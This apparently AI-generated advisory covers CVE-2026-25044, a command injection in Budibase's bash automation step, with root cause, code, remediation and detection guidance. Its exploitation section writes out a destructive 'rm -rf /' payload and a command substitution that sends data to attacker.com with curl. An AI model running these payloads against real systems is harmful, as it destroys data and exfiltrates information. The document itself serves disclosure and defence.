CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.


CVE-2026-25044: Remote Code Execution via OS Command Injection in Budibase Bash Automations

Alon Barad
Software Engineer

Apr 3, 2026

PoC Available

Executive Summary (TL;DR)

Unsanitized input in the Budibase bash automation feature allows low-privileged users to execute arbitrary OS commands via Node.js execSync. Upgrading to version 3.33.4 resolves the issue.

Budibase versions prior to 3.33.4 contain a critical OS command injection vulnerability in the platform's bash automation step. An authenticated attacker with privileges to create or modify automations can inject shell metacharacters, leading to remote code execution on the host system.

Vulnerability Overview

Budibase is an open-source low-code platform designed to build internal tools and applications. The platform includes an automations feature that allows users to define custom workflows, including a specific "bash automation" step intended to execute administrative or utility scripts on the underlying server.

CVE-2026-25044 is an OS Command Injection vulnerability (CWE-78) located within this bash automation logic. The vulnerability affects all Budibase versions prior to 3.33.4. The core issue stems from improper neutralization of special elements used in an OS command, allowing malicious input to alter the execution context.

An attacker requires low privileges (PR:L) to exploit this vulnerability, specifically the ability to create or modify automations within the Budibase portal. Successful exploitation results in arbitrary code execution with the permissions of the Node.js process running the Budibase server application.

Root Cause Analysis

The vulnerability is located in the backend server's automation processing logic, specifically within the packages/server/src/automations/steps/bash.ts file. The application processes user-provided bash commands through a template interpolation function named processStringSync before execution.

This function handles template syntax elements but fails to sanitize standard shell metacharacters. The resulting string is subsequently passed directly to the Node.js execSync function. The execSync method inherently invokes a system shell (such as /bin/sh or cmd.exe) to execute the provided command string.

Because the input string is not strictly sanitized, the shell evaluates any injected metacharacters. An attacker can break out of the intended command structure using standard techniques like command substitution or statement termination, forcing the shell to execute secondary malicious binaries alongside or instead of the original script.

Code Analysis

The vulnerable code path initiates execution without sanitizing the output from the template processor. The string generated by processStringSync is passed unmodified into execSync, granting the shell complete authority over interpretation.

// VULNERABLE: packages/server/src/automations/steps/bash.ts
import { execSync } from "child_process"

// Template interpolation only; shell metacharacters in the result survive untouched
const command = processStringSync(inputs.code, context)

let stdout, success = true
try {
  // execSync hands the whole string to a system shell, so ";" and "$(...)" are interpreted
  stdout = execSync(command, {
    timeout: environment.QUERY_THREAD_TIMEOUT,
  }).toString()
} catch (err) {
  // Error handling omitted
}

The patch introduced in version 3.33.4 completely eliminates the reliance on execSync. The developers transitioned to the spawn method, which avoids wrapping the command in a shell environment. Furthermore, they introduced a strict sanitizeCommand function to strip dangerous metacharacters prior to splitting the command into an argument array.

// PATCHED: packages/server/src/automations/steps/bash.ts
import { spawn } from "child_process"
 
function sanitizeCommand(input: string): string {
  return input.replace(/[;&|`$(){}[\]]/g, "").trim()
}
 
// Subsequent logic utilizes spawn(cmd, args) instead of execSync

This remediation addresses the flaw at two levels. First, the regex effectively neutralizes the primary vectors for command stacking and substitution. Second, replacing execSync with spawn prevents the host operating system from interpreting the input string as a multi-statement shell script, neutralizing residual shell execution risks.
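To make the before/after difference concrete, the following is an added example written for this report, not code taken from Budibase. It reuses the sanitizeCommand regex quoted from the patch, but interpolateTemplate (a stand-in for processStringSync), the whitespace split in toArgv and the spawnSync wrapper are assumptions of mine rather than the project's implementation.

```typescript
import { spawnSync } from "child_process"

// Stand-in for processStringSync: substitutes {{ name }} from the automation
// context. An assumption for this example; Budibase's real interpolation is richer.
export function interpolateTemplate(template: string, context: Record<string, string>): string {
  return template.replace(/\{\{\s*(\w+)\s*\}\}/g, (_, name: string) => context[name] ?? "")
}

// Regex exactly as the report quotes it from the 3.33.4 patch.
function sanitizeCommand(input: string): string {
  return input.replace(/[;&|`$(){}[\]]/g, "").trim()
}

// Split the sanitized string into argv. Budibase's own splitter is not shown
// in the report; this whitespace split is an assumption.
export function toArgv(command: string): string[] {
  return sanitizeCommand(command).split(/\s+/).filter((s) => s.length > 0)
}

// Post-patch path: spawnSync without the `shell` option. argv[0] is resolved
// on PATH and everything else reaches the program as literal arguments, so an
// injected "; id" or "$(whoami)" cannot start a second command. The pre-patch
// path handed the interpolated string to execSync, i.e. to /bin/sh, where
// those characters keep their shell meaning.
export function runWithoutShell(
  template: string,
  context: Record<string, string>,
): { argv: string[]; stdout: string; status: number | null } {
  const argv = toArgv(interpolateTemplate(template, context))
  if (argv.length === 0) return { argv, stdout: "", status: null }
  const res = spawnSync(argv[0], argv.slice(1), { encoding: "utf8", timeout: 5000 })
  return { argv, stdout: res.stdout ?? "", status: res.status }
}
```

Note the redirection case in the checks below: the patch regex leaves `>` alone, and it is the absence of a shell in spawn, not the regex, that stops it from being interpreted (cat simply receives ">" as a literal argument).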

Exploitation Methodology

Exploitation begins with the attacker authenticating to the Budibase portal using an account authorized to manage automations. The attacker navigates to the "Automations" section and either creates a new workflow or modifies an existing one to include a "Bash Script" execution step.

The attacker then supplies a malicious payload in the automation's input field. This payload utilizes shell metacharacters to execute unauthorized commands. For example, injecting ; rm -rf / ; terminates the preceding legitimate command and initiates the malicious payload.

If the script utilizes variables handled by the template engine, the attacker can manipulate those inputs. Supplying a variable value such as $(curl http://attacker.com/$(whoami)) triggers command substitution when evaluated by the shell.

Impact Assessment

Successful exploitation of CVE-2026-25044 grants the attacker complete control over the underlying system environment executing the Budibase server. The injected commands run within the context and permission scope of the Budibase application process.

The CVSS v4.0 base score of 8.7 reflects the critical severity of this flaw. The vector CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N highlights that the attack is executable over the network with low complexity, requiring only basic user privileges and resulting in high impact across confidentiality, integrity, and availability.

An attacker can leverage this initial access to read sensitive configuration files, modify internal databases, or establish persistence. If the Budibase instance is deployed without strict containerization or network segmentation, the compromised server serves as a pivot point for lateral movement into the broader enterprise network.

Remediation Guidance

The definitive remediation for CVE-2026-25044 is to upgrade the Budibase deployment to version 3.33.4 or later. This version contains the necessary architectural changes to the automation step execution flow and the requisite input sanitization functions.

Organizations unable to apply the patch immediately should implement interim mitigations. Administrators can disable the "Bash Automation" step globally by modifying the Budibase environment variables, thus completely removing the vulnerable attack surface until patching is feasible.

Security teams should also review system logs for indicators of compromise. Monitoring should focus on unexpected child processes spawned by the Budibase server application, as well as the presence of shell metacharacters like $(, ;, or | within the recorded parameters of automation execution logs.

Technical Appendix

CVSS Score: 8.7 / 10
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Affected Systems

  • Budibase Backend Server
  • Budibase Automations Module

Affected Versions Detail

Product: Budibase
Affected Versions: < 3.33.4
Fixed Version: 3.33.4

CWE ID: CWE-78
Attack Vector: Network
CVSS v4.0: 8.7
Privileges Required: Low
Impact: Remote Code Execution
Exploit Status: PoC Available

MITRE ATT&CK Mapping

T1059 Command and Scripting Interpreter (Execution)
T1059.004 Unix Shell (Execution)
CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

Vulnerability Timeline

2026-04-03: Vulnerability publicly disclosed and CVE-2026-25044 assigned
2026-04-03: GitHub Advisory GHSA-gjw9-34gf-rp6m published
2026-04-03: Budibase version 3.33.4 released with the fix


Attack Flow Diagram